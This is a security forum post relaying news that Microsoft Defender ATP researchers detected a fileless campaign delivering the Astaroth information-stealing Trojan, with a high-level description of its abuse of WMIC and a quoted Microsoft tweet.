silversurfer
Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
- Aug 17, 2014
- 10,154
A fileless malware campaign used by attackers to drop the information stealing Astaroth Trojan into the memory of infected computers was detected by Microsoft Defender ATP Research Team researchers.
The Astaroth Trojan and information stealer is a malware strain capable of stealing sensitive information such as user credentials from its victims using a key logger module, operating system calls interception, and clipboard monitoring.
Astaroth is also known for abusing living-off-the-land binaries (LOLbins) such as the command line interface of the Windows Management Instrumentation Command-line (WMIC) to stealthily download and install malware payloads in the background.
We recently unearthed a campaign that completely "lived off the land" throughout a complex attack chain that ran the info-stealing backdoor #Astaroth directly in memory. See how #MicrosoftDefenderATP next-gen protection defeated the #fileless attack: https://t.co/c2G53Ll2kf
— Microsoft Security Intelligence (@MsftSecIntel) July 8, 2019